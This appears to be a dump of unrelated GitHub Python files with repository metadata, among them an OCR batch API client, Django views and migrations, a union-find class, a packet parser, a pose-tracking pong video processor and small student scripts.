self.allowed_tasks = {}\n if id is not None:\n r = requests.get('{}/batch/{}'.format(host, id))\n r.raise_for_status()\n\n def create_batch(self):\n \"\"\"\n Creates a batch on the server. Also synchronizes the list of available\n tasks and their parameters.\n \"\"\"\n if self.id is not None:\n raise NidabaInputException('SimpleBatch object already initialized')\n r = requests.post('{}/batch'.format(self.host))\n r.raise_for_status()\n self.id = r.json()['id']\n self.lock = False\n self.get_available_tasks()\n return self.id\n\n def get_available_tasks(self):\n \"\"\"\n Synchronizes the local task/parameter list with the remote server.\n \"\"\"\n r = requests.get('{}/tasks'.format(self.host))\n r.raise_for_status()\n self.allowed_tasks = r.json()\n\n def is_running(self):\n \"\"\"\n Returns True if the batch's run() method has been successfully called, otherwise False.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n self.lock = True\n if r.json():\n self.lock = True\n return True\n else:\n self.lock = False\n return False\n\n def get_state(self):\n \"\"\"\n Retrieves the current state of a batch.\n\n Returns:\n (unicode): A string containing one of the following states:\n\n NONE: The batch ID is not registered in the backend.\n FAILURE: Batch execution has failed.\n PENDING: The batch is currently running.\n SUCCESS: The batch has completed successfully.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n batch = r.json()\n if 'scratchpad' in batch:\n return u'NONE'\n elif 'chains' in batch:\n self.lock = True\n batch = batch['chains']\n st = u'SUCCESS'\n for subtask in batch.itervalues():\n if subtask['state'] == 'PENDING' or subtask['state'] == 'RUNNING':\n st = u'PENDING'\n if subtask['state'] == 'FAILURE':\n return u'FAILURE'\n return st\n else:\n return u'NONE'\n\n def get_extended_state(self):\n \"\"\"\n Returns the extended batch state.\n\n Raises:\n NidabaInputException if the batch hasn't been executed yet.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n if 'chains' in r.json():\n self.lock = True\n return r.json()['chains']\n\n def get_results(self):\n \"\"\"\n Retrieves the storage tuples of a successful batch.\n\n Returns:\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n if 'chains' in r.json():\n self.lock = True\n batch = r.json()['chains']\n outfiles = []\n for subtask in batch.itervalues():\n if len(subtask['children']) == 0 and subtask['result'] is not None:\n outfiles.append((subtask['result'], subtask['root_documents']))\n return outfiles\n else:\n return None\n\n def get_tasks(self):\n \"\"\"\n Returns the task tree either from the scratchpad or from the pipeline\n when already in execution.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}/tasks'.format(self.host, self.id))\n r.raise_for_status()\n return r.json()\n\n def get_documents(self):\n \"\"\"\n Returns the list of input document for this task.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n r = requests.get('{}/batch/{}/pages'.format(self.host, self.id))\n r.raise_for_status()\n return r.json()\n\n def add_document(self, path, callback, auxiliary=False):\n \"\"\"\n Add a document to the batch.\n\n Uploads a document to the API server and adds it to the batch.\n\n ..note::\n Note that this function accepts a standard file system path and NOT\n a storage tuple as a client using the web API is not expected to\n keep a separate, local storage medium.\n\n Args:\n path (unicode): Path to the document\n callback (function): A function that is called with a\n ``requests_toolbelt.multipart.encoder.MultipartEncoderMonitor``\n instance.\n auxiliary (bool): Switch to disable setting the file as an input\n document. May be used to upload ground truths,\n metadata, and other ancillary files..\n\n Raises:\n NidabaInputException: The document does not refer to a file or the\n batch is locked because the run() method has\n been called.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n if auxiliary:\n params = {'auxiliary': True}\n else:\n params = {}\n m = encoder.MultipartEncoderMonitor.from_fields(\n fields={'scans': (os.path.basename(path), open(path, 'rb'))},\n callback=callback)\n r = requests.post('{}/batch/{}/pages'.format(self.host, self.id),\n data=m, headers={'Content-Type': m.content_type},\n params=params)\n r.raise_for_status()\n return r.json()[0]['url']\n\n def rm_document(self, path):\n \"\"\"\n Removes a document from the batch.\n\n ..note::\n Note that this function accepts a standard file system path and NOT\n a storage tuple as a client using the web API is not expected to\n keep a separate, local storage medium.\n\n Args:\n path (unicode): Path to the document\n\n Raises:\n NidabaInputException: The document does not refer to a file or the\n batch is locked because the run() method has\n been called.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n r = requests.delete('{}/batch/{}/pages'.format(self.host, self.id),\n json={'scans': [path]})\n r.raise_for_status()\n\n def add_task(self, group, method, *args, **kwargs):\n \"\"\"\n Add a particular task configuration to a task group.\n\n Args:\n group (unicode): Group the task belongs to\n method (unicode): Name of the task\n kwargs: Arguments to the task\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.allowed_tasks or method not in self.allowed_tasks[group]:\n raise NidabaInputException('Unknown task {}'.format(method))\n r = requests.post('{}/batch/{}/tasks/{}/{}'.format(self.host, self.id,\n group, method),\n json=kwargs)\n r.raise_for_status()\n\n def rm_task(self, group, method, *args, **kwargs):\n \"\"\"\n Removes a particular task configuration from the batch.\n\n Args:\n group (unicode): Group the task belongs to\n method (unicode): Name of the task\n kwargs: Arguments to the task\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.allowed_tasks or method not in self.allowed_tasks[group]:\n raise NidabaInputException('Unknown task {}'.format(method))\n r = requests.delete('{}/batch/{}/tasks/{}/{}'.format(self.host, self.id,\n group, method),\n json=kwargs)\n r.raise_for_status()\n\n def run(self):\n \"\"\"\n Executes the current batch definition.\n\n Expands the current batch definition to a series of celery chains and\n executes them asynchronously. Additionally a batch record is written to\n the celery result backend.\n\n Returns:\n (unicode): Batch identifier.\n \"\"\"\n if not self.id:\n raise NidabaInputException('Object not attached to batch.')\n if self.lock:\n raise NidabaInputException('Executed batch may not be reexecuted')\n r = requests.post('{}/batch/{}'.format(self.host, self.id))\n r.raise_for_status()\n return self.id\n","repo_name":"OpenPhilology/nidaba","sub_path":"nidaba/nidaba.py","file_name":"nidaba.py","file_ext":"py","file_size_in_byte":32138,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"27"} +{"seq_id":"2132447108","text":"import pandas as pd\nimport sys\nimport getopt\nimport yaml\n\n# Arguments\nif len(sys.argv) != 2:\n print('Usage parsehtml.py ')\n sys.exit()\n\ninputfile = sys.argv[1]\n\nif not inputfile.endswith('.html'):\n print('Input file needs to be .html. Found : {}'.format(inputfile))\n sys.exit()\n\n# Main\ninfile=open(inputfile, \"r+\")\n\ntables = pd.read_html(infile, match='Prefix')\n\nfor table in tables:\n #print(table)\n prefixes = table[\"Prefix\"]\n\n if ':' in prefixes[0]:\n # IPv6\n print('Skipping ipv6 table')\n continue\n if not '.' in prefixes[0]:\n print('Skipping unknown table')\n continue\n\n # IPv4\n outputfile = inputfile.replace('.html', '.yml')\n print('Writing to {}'.format(outputfile))\n with open(outputfile, 'w') as outfile:\n outfile.write(yaml.dump(prefixes.tolist()))\n \n","repo_name":"TokyoQ/techedits","sub_path":"parsehtml/parsehtml.py","file_name":"parsehtml.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20491282743","text":"from django.core.management.base import BaseCommand\nfrom rooms.models import HouseRule\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates House rules!\"\n\n def handle(self, *args, **options):\n houserules = [\n \"Suitable for events\",\n \"Pets allowed\",\n \"Smoking allowed\",\n ]\n for h in houserules:\n HouseRule.objects.create(name=h)\n self.stdout.write(self.style.SUCCESS(f\"{len(houserules)} House Rules Created!\"))\n","repo_name":"cande0/airbnb-clone","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42090185744","text":"from functools import reduce\n\n\nclass Human:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\nclass Cinderella(Human):\n __count = 0\n\n def __init__(self, name, age, leg_size):\n super().__init__(name, age)\n self.leg_size = leg_size\n Cinderella.__count += 1\n\n def __str__(self):\n return f\"Имя: {self.name}\\nВозраст: {self.age}\\nРазмер туфлей: {self.leg_size}\"\n\n @classmethod\n def count(cls):\n return cls.__count\n\n\nclass Prince(Human):\n def __init__(self, name, age, leg_size):\n super().__init__(name, age)\n self.leg_size = leg_size\n\n def find(self, array):\n for cin in array:\n if self.leg_size == cin.leg_size:\n return cin\n\n\n\n\n\nclass Notebook:\n\n\n @classmethod\n def notes_decorator(cls, func):\n def inner(*args, **kwargs):\n note = open('notes.txt', '+')\n eval(f\"cls.{func.__name__}(note, *args, **kwargs)\")\n note.close()\n\n return inner\n\n @classmethod\n @notes_decorator\n def append(cls, note, value):\n note.writelines([line + '\\n' for line in value])\n\n @classmethod\n def to_dict(cls, obj):\n temp_dict = {}\n for attr in dir(obj):\n print(attr)\n if not attr.startswith(\"__\"):\n temp_dict[attr] = getattr(obj, attr)\n temp_dict['type'] = type(obj)\n return temp_dict\n \n @classmethod\n def to_obj(cls, dit):\n if dit['type'] == type(Human):\n return Human(dit['name'], dit['age'])\n elif dit['type'] == type(Cinderella):\n return Cinderella(dit['name'], dit['age'], dit['leg_size'])\n elif dit['type'] == type(Prince):\n return Prince(dit['name'], dit['age'], dit['leg_size'])\n\n\n\n\n @classmethod\n def create(cls):\n name = input(\"Введите название товара: \")\n cost = int(input(\"Введите цену товара: \"))\n cls.append({'name': name, \"cost\": cost})\n\n @classmethod\n @notes_decorator\n def all_notes(cls, notes):\n for note in notes:\n print(f\"{note['name']}\\n Цена: {note['cost']}\")\n\n @classmethod\n def all_cost(cls):\n return reduce(lambda a, b: a + b['cost'], cls.__notes, 0)\n\n @classmethod\n def max_cost(cls):\n temp = 0\n for note in cls.__notes:\n if temp < note['cost']:\n temp = note['cost']\n return temp\n\n @classmethod\n def find(cls):\n temp = input(\"Введите искомый товар в списке: \")\n for note in cls.__notes:\n if temp == note['name']:\n return f\"{note['name']}\\nЦена: {note['cost']}\"\n\n\nwhile True:\n print(\"1. Создать запись\")\n print(\"2. Список всех записей\")\n print(\"3. Общая сума всех покупок\")\n print(\"4. Самая до��огая покупка\")\n print(\"5. Поиск по названию покупки\")\n print(\"6. Виход\")\n ans = input(\"Виберите действие: \")\n if ans == '1':\n Notebook.create()\n elif ans == '2':\n Notebook.all_notes()\n elif ans == '3':\n print(Notebook.all_cost())\n elif ans == '4':\n print(Notebook.max_cost())\n elif ans == '5':\n print(Notebook.find())\n elif ans == '6':\n break\n else:\n print(\"ВЫБЕРИТЕ ИЗ МЕНЮ!\")\n","repo_name":"Rufused/Python","sub_path":"hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13234402494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 19:05:42 2023\n\n@author: ivan_\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Lee el archivo CSV\nmainpath = \"C:/Users/ivan_/Documents/Escuela/8vo/Ciencia de datos/\"\nfilename_airbnb = \"airbnb_completo.csv\"\nfilename_reviews = \"reviews.csv\"\n\n# Lee los archivos CSV\ndf_airbnb = pd.read_csv(mainpath + filename_airbnb)\ndf_reviews = pd.read_csv(mainpath + filename_reviews)\n\n# Fusiona los DataFrames por el listing_id\ndf_merged = pd.merge(df_airbnb, df_reviews, on='listing_id')\n\n# Convierte la columna \"date\" en formato de fecha\ndf_merged['date'] = pd.to_datetime(df_merged['date'])\n\n# Obtén el rango de fechas\nfecha_min = df_merged['date'].min().date()\nfecha_max = df_merged['date'].max().date()\n\n# Cuenta el número total de reviews\nnum_reviews_total = df_merged.shape[0]\n\n# Cuenta el número de reviewer_id sin contar repetidos\nnum_reviewers = df_merged['reviewer_id'].nunique()\n\n# Agrupa los datos por ciudad, año y cuenta la cantidad de reviews\ndf_grouped = df_merged.groupby(['city', df_merged['date'].dt.year]).size().reset_index(name='review_count')\n\n# Grafica la actividad de las reviews por ciudad durante el tiempo\nfig, ax = plt.subplots(figsize=(12, 6))\n\n# Recorre las ciudades y grafica una línea para cada una\nfor city in df_grouped['city'].unique():\n df_city = df_grouped[df_grouped['city'] == city]\n ax.plot(df_city['date'], df_city['review_count'], label=city)\n\n# Personaliza el gráfico\nax.set_xlabel('Año')\nax.set_ylabel('Cantidad de Reviews')\nax.set_title('Actividad de Reviews por Ciudad')\nax.legend()\n\n# Imprime el rango de fechas, el número total de reviews y el número de reviewers\nprint(\"Rango de fechas:\", fecha_min, \"a\", fecha_max)\nprint(\"Número total de reviews:\", num_reviews_total)\nprint(\"Número de reviewers únicos:\", num_reviewers)\n\n# Muestra el gráfico\nplt.show()\n\n# Reorganiza los datos con pivot\ndf_pivot = df_grouped.pivot(index='city', columns='date', values='review_count')\n\n# Restablece el índice del DataFrame df_pivot\ndf_pivot = df_pivot.reset_index()\n\n# Guarda el DataFrame df_pivot en un nuevo archivo CSV\noutput_filename = \"reviews_actividad_ciudades.csv\"\ndf_pivot.to_csv(output_filename, index=False)","repo_name":"VmasterpartV/airbnb_data","sub_path":"reviews_per_year.py","file_name":"reviews_per_year.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39752449392","text":"import socket\nhost = socket.gethostname() #getting host\nport = 6518\nprint(\"Enter number: \\n1 for Pyjamask-128 encryption\\n2 for Pyjamask-128 decryption\\n\")\nx=input()\n#creating the socket and connecting to host,port\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint(\"\\nConnecting to the server \\n\")\ns.send(bytes(x,'utf-8'))\nif x==\"1\":\n \n print(\"Connected with Pyjamask-128 Encryption Server\\n\")\n print(\"Enter the message to be encrypted:\\n\")\n inp_msg=input()\n s.send(bytes(inp_msg,'utf-8'))\n print(\"\\nEnter the secret key(32 hex values only):\")\n secret_key=input()\n s.send(bytes(secret_key,'utf-8'))\n cipher_text=s.recv(1024).decode()\n print(cipher_text,\"\\n\")\n s.close()\n\nif x==\"2\":\n print(\"Connected with Pyjamask-128 Decryption Server\\n\")\n print(\"Enter the ciphertext to be decrypted:\\n\")\n cip_msg=input()\n s.send(bytes(cip_msg,'utf-8'))\n print(\"\\nEnter the secret key(32 hex values only):\")\n secret_key=input()\n s.send(bytes(secret_key,'utf-8'))\n plain_text=s.recv(1024).decode()\n print(plain_text)\n s.close()\n","repo_name":"Tarunvetsa/Pyjamask128-Client_Server","sub_path":"Pyjamask-128_Encryption&Decryption/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71453167111","text":"\"\"\"\nhttps://leetcode.com/problems/top-k-frequent-elements/\n\nGiven a non-empty array of integers, return the k most frequent elements.\n\nExample 1:\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\nExample 2:\n\nInput: nums = [1], k = 1\nOutput: [1]\nNote:\n\nYou may assume k is always valid, 1 ≤ k ≤ number of unique elements.\nYour algorithm's time complexity must be better than O(n log n), where n is the array's size.\nIt's guaranteed that the answer is unique, in other words the set of the top k frequent elements is unique.\nYou can return the answer in any order.\n\"\"\"\n\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n frequency = {}\n for num in nums:\n frequency[num] = frequency.get(num, 0) + 1\n\n heap = []\n keys = list(frequency.keys())\n i = 0\n while i < k:\n heap.append((frequency[keys[i]], keys[i]))\n # heapq.heappush(heap, (frequency[keys[i]], keys[i]))\n i += 1\n\n heapq.heapify(heap)\n\n while i < len(keys):\n if heap[0][0] < frequency[keys[i]]:\n heapq.heappop(heap)\n heapq.heappush(heap, (frequency[keys[i]], keys[i]))\n i += 1\n\n return [ele[1] for ele in heap]\n\n\nif __name__ == '__main__':\n nums = [1, 1, 1, 2, 2, 3]\n k = 2\n print(Solution(). topKFrequent(nums, k))\n","repo_name":"emptybename/Ds-Algo","sub_path":"heap/problems/k_most_frequent_elements.py","file_name":"k_most_frequent_elements.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17904890784","text":"import cv2 as cv\nimport mediapipe as mp\nimport time\nimport copy\nimport numpy as np\n\nclass VideoProcessor():\n\n def __init__(self) -> None:\n # Camera and frame\n self.cam = cv.VideoCapture(0)\n self.cur_frame = None\n\n # Pose detection\n self.mp_pose = mp.solutions.pose\n self.mp_draw = mp.solutions.drawing_utils\n self.pose = self.mp_pose.Pose()\n\n # FPS Information\n self.cur_time = None\n self.prev_time = 0 \n \n def show_fps(self, frame):\n self.cur_time = time.time()\n fps = int(1/(self.cur_time - self.prev_time))\n self.prev_time = self.cur_time\n return cv.putText(frame, 'FPS:' + str(fps), (70,80), cv.FONT_HERSHEY_PLAIN, 3, (255,0,0), thickness=10)\n\n def close(self):\n self.cam.release()\n cv.destroyAllWindows()\n\n def split_frame_into_2(self, frame):\n height, width, channels = frame.shape\n\n # Right Half - left side is blacked out\n r = copy.deepcopy(frame)\n r[:, 0:width//2] = np.zeros(shape=(height, width//2, channels))\n\n # Left Half - right side is blacked out\n frame[:, width//2:] = np.zeros(shape=(height, width//2, channels))\n \n return frame, r\n\n def break_frame_into_2(self, frame):\n h,w,c = frame.shape\n left = frame[:,0:w//2]\n right = frame[:,w//2:]\n return left, right\n \n def stitch_left_and_right(self, left, right):\n h,w,c = left.shape\n left[:, w//2:] = right[:, w//2:]\n cv.line(left, pt1=(w//2,0), pt2=(w//2,h), color=(255,255,255), thickness=100)\n return left\n \n def draw_nose_line(self, frame, coord, side):\n if coord:\n x,y = coord\n if side == 'left':\n color = (255,0,0)\n else:\n color = (0,0,255)\n frame = cv.line(frame, pt1 = (x-20, y), pt2=(x+20, y), color=color, thickness=4)\n return frame\n \n def get_nose_coord(self, frame):\n frame_width = frame.shape[1]\n frame_height = frame.shape[0]\n frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n\n # Get the Pose Landmarks\n results = self.pose.process(frame)\n if results.pose_landmarks:\n self.mp_draw.draw_landmarks(frame, results.pose_landmarks, self.mp_pose.POSE_CONNECTIONS)\n\n # Nose Y is the Y coordinate of your nose in the frame\n nose_y = int(results.pose_landmarks.landmark[self.mp_pose.PoseLandmark.NOSE].y * frame_height)\n nose_x = int(results.pose_landmarks.landmark[self.mp_pose.PoseLandmark.NOSE].x * frame_width)\n else:\n return None\n\n return (nose_x, nose_y)\n \n def get_Y_coords(self, show_video = False):\n ret, frame = self.cam.read()\n if not ret: return None\n \n h,w,c = frame.shape\n frame = cv.flip(frame, 1)\n\n frame = self.show_fps(frame)\n\n # Break frame into 2 halves\n left, right = self.break_frame_into_2(frame)\n\n # Get poses for both halves\n left_nose_coord = self.get_nose_coord(left)\n right_nose_coord = self.get_nose_coord(right)\n\n left = self.draw_nose_line(left, left_nose_coord, 'left')\n right = self.draw_nose_line(right, right_nose_coord, 'right')\n\n frame = np.concatenate((left,right),axis=1)\n\n self.cur_frame = frame\n\n # EXTRA: Modify right coord to so that its in the right place in the bigger frame\n # right_nose_coord[0] += w//2\n\n if show_video:\n cv.imshow(\"Video Feed\", frame)\n \n ret = tuple()\n \n return (left_nose_coord[1] if left_nose_coord else None\n , right_nose_coord[1] if right_nose_coord else None)\n\n \n\n\n\nif __name__ == '__main__':\n vp = VideoProcessor()\n\n while True:\n ret, frame = vp.cam.read()\n \n if not ret: continue\n\n h,w,c = frame.shape\n frame = cv.flip(frame, 1)\n\n frame = vp.show_fps(frame)\n\n # Split frame into 2 halves\n # left, right = vp.split_frame_into_2(frame)\n \n left, right = vp.break_frame_into_2(frame)\n\n # # # Get poses for both halves\n left_nose_coord = vp.get_nose_coord(left)\n right_nose_coord = vp.get_nose_coord(right)\n\n # # if left_nose_coord:\n # # print('Left Nose', left_nose_coord[1], ' ------ ', end='')\n # # if right_nose_coord:\n # # print('Right Nose', right_nose_coord[1], end='')\n # # print()\n\n left = vp.draw_nose_line(left, left_nose_coord, 'left')\n right = vp.draw_nose_line(right, right_nose_coord, 'right')\n\n frame = np.concatenate((left,right),axis=1)\n\n cv.imshow(\"Video Feed\", frame)\n\n if cv.waitKey(33) == ord('q'):\n break\n\n vp.close()","repo_name":"bluepra/PongVision","sub_path":"unused_code/BodyVideoProcessor.py","file_name":"BodyVideoProcessor.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35021952507","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Evento, FotoEvento\nfrom centro_memoria.instituicao.models import Instituicao\n\ndef eventos(request):\n instituicao = get_object_or_404(Instituicao)\n eventos = Evento.objects.all().filter(ativo=True).order_by('-criado_em')\n fotos_eventos_destaque = FotoEvento.objects.all().filter(evento__in=eventos, destaque=True)\n template_name = 'eventos.html'\n context = {\n 'eventos': eventos,\n 'fotos_eventos_destaque': fotos_eventos_destaque,\n 'instituicao': instituicao\n }\n return render(request, template_name, context)\n\ndef evento_detalhes(request, titulo):\n instituicao = get_object_or_404(Instituicao)\n evento = get_object_or_404(Evento, nome__iexact=titulo)\n foto_evento = FotoEvento.objects.all().filter(evento=evento, destaque=True)\n\n outros_eventos = Evento.objects.all().filter(ativo=True, destaque=True).exclude(pk=evento.pk).order_by('-criado_em')\n if len(outros_eventos) > 0:\n outros_eventos = outros_eventos[:6]\n fotos_outros_eventos = FotoEvento.objects.all().filter(evento__in=outros_eventos, destaque=True)\n\n template_name = 'evento_detalhes.html'\n context = {\n 'evento': evento,\n 'foto_evento': foto_evento,\n 'instituicao': instituicao,\n 'outros_eventos': outros_eventos,\n 'fotos_outros_eventos': fotos_outros_eventos\n }\n return render(request, template_name, context)","repo_name":"ifspcodelab/centro-memoria-ifsp-2020","sub_path":"centro_memoria/centro_memoria/eventos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5803882851","text":"#!/usr/bin/env python3\n\n\"\"\"Implements disjoint-set data structures (so-called union-find data structures).\n\nVerification: [Union Find](https://judge.yosupo.jp/submission/11774)\n\"\"\"\n\n\nclass UnionFind(object):\n \"\"\"A simple implementation of disjoint-set data structures.\n \"\"\"\n\n\n def __init__(self, number_of_nodes):\n \"\"\"Create a disjoint-data structure with `number_of_nodes` nodes.\n \"\"\"\n self.par = list(range(number_of_nodes))\n self.rank = [0] * number_of_nodes\n\n def root(self, node):\n \"\"\"Returns the root of node #`node`.\n \"\"\"\n if self.par[node] == node:\n return node\n else:\n r = self.root(self.par[node])\n self.par[node] = r\n return r\n\n def in_the_same_set(self, node1, node2):\n \"\"\"See if the given two nodes #`node1` and #`node2` are in the same set.\n \"\"\"\n return self.root(node1) == self.root(node2)\n\n def unite(self, node1, node2):\n \"\"\"Unite the set containing node #`node1` and the another set containing node #`node2`.\n \"\"\"\n x = self.root(node1)\n y = self.root(node2)\n if x != y:\n if self.rank[x] < self.rank[y]:\n x, y = y, x\n self.par[y] = x\n if self.rank[x] == self.rank[y]:\n self.rank[x] += 1\n","repo_name":"hamukichi/SunflowerSeeds","sub_path":"library/python/data-structure/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35511812443","text":"# Author:GaoYuCai\n#属性方法:把一个方法变成一个静态属性\nclass Flight(object):\n def __init__(self,name):\n self.name=name\n def cheching_status(self):\n print(\"checking flight %s status\"%self.name)\n return 1\n @property\n def fright_status(self):\n status=self.cheching_status()#重点\n if status==0:\n print(\"flight got canceled...\")\n elif status==1:\n print(\"flight is arrived...\")\n elif status==2:\n print(\"flight has departured already...\")\n else:\n print(\"Cannot confirm the flight status...please check later\")\n\nf=Flight(\"CA980\")\nf.fright_status\n","repo_name":"gaoyucai/Python_Project","sub_path":"Python_day7/属性方法_e.py","file_name":"属性方法_e.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40282530033","text":"from django.db import migrations, models\nimport django.db.models.deletion\nimport ngos.models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Level',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(default=ngos.models.generate_ngo_key, max_length=4, unique=True)),\n ('rank', models.IntegerField()),\n ('is_active', models.BooleanField(blank=True, default=True)),\n ('mr_in', models.CharField(max_length=50)),\n ('en_in', models.CharField(max_length=50)),\n ('creation_time', models.DateTimeField(auto_now_add=True)),\n ('last_modification_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'db_table': 'levels',\n },\n ),\n migrations.CreateModel(\n name='NGO',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(default=ngos.models.generate_ngo_key, max_length=4, unique=True)),\n ('name', models.CharField(max_length=100, unique=True)),\n ('address', models.CharField(max_length=200)),\n ('logo', models.CharField(blank=True, max_length=200, null=True)),\n ('description', models.CharField(blank=True, max_length=200, null=True)),\n ('is_active', models.BooleanField(blank=True, default=True)),\n ('creation_time', models.DateTimeField(auto_now_add=True)),\n ('last_modification_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'db_table': 'ngos',\n },\n ),\n migrations.AddField(\n model_name='level',\n name='ngo',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='ngos.NGO'),\n ),\n migrations.AlterUniqueTogether(\n name='level',\n unique_together={('ngo', 'rank')},\n ),\n ]\n","repo_name":"maverick-labs-pune/read-server","sub_path":"read/ngos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1423572925","text":"from django.urls import path\n\nfrom . import views\n\n\napp_name = 'monix'\nurlpatterns = [\n # ex: /monix/\n path('', views.IndexView.as_view(), name='index'),\n path('remove/', views.remove, name='remove'),\n path('add/', views.add, name='add'),\n]\n\n","repo_name":"ClubNix/monix","sub_path":"djangoapp/monix/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"24593091503","text":"with open(\"input.txt\") as f:\n hex_packet = f.readline().rstrip()\n packet = int(hex_packet, 16)\n packet_length = len(hex_packet) * 4\n \n\nn_last = 0\n\ndef next_n_digits(n):\n global packet\n global n_last\n offset = (packet_length - n_last) - n \n ones = (0b1 << n) - 1\n n_digits = (packet & (ones << offset)) >> offset\n n_last += n\n # print(n_digits, n_last)\n return n_digits\n\ndef is_end():\n remaining_bits = packet & ((0b1 << (packet_length - n_last)) - 1)\n return remaining_bits == 0\n \nversion_total = 0\n\ndef gt(nums): return nums[0] > nums[1]\ndef lt(nums): return nums[0] < nums[1]\ndef eq(nums): return nums[0] == nums[1]\ndef prod(nums):\n i = 1\n for num in nums:\n i *= num\n return i\n\ndef parse():\n \n type_to_func = {0: sum, 1: prod, 2: min, 3: max, 5:gt, 6:lt, 7:eq}\n\n global version_total\n version = next_n_digits(3)\n type_id = next_n_digits(3)\n \n version_total += version\n \n if type_id == 4:\n literal = 0\n while not is_end():\n keep_reading = next_n_digits(1)\n next_subpacket = next_n_digits(4)\n\n literal = (literal << 4) | next_subpacket\n if not keep_reading:\n return literal\n \n length_type_id = next_n_digits(1)\n length = 15 if length_type_id == 0 else 11\n \n count_remaining = next_n_digits(length)\n \n parse_list = []\n while not is_end():\n n_initial = n_last\n next_parse = parse()\n parse_list.append(next_parse)\n \n count_remaining -= (n_last - n_initial if length_type_id == 0 else 1)\n \n if count_remaining <= 0 or is_end():\n func = type_to_func[type_id]\n return func(parse_list)\n \nwhile not is_end():\n final_num = parse()\n \n#Part 1\nprint(version_total)\n \n#Part 2\nprint(final_num)\n","repo_name":"Banbadle/advent","sub_path":"16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34089975188","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport imp\n\nfrom redis import StrictRedis\n\nfrom cassandra.cqlengine import connection\nfrom cassandra.cqlengine.management import sync_table\nfrom cassandra.cqlengine.management import drop_table\n\nfrom models import ShoppingList, User\n\ndef _get_default_config_path():\n for name in (\"prod.py\", \"dev.py\"):\n path = \"config/{}\".format(name)\n if os.path.exists(path):\n return path\n else:\n logger.error(\"Couldn't locate the files in config/\")\n exit(1)\n\n\ndef load_config():\n 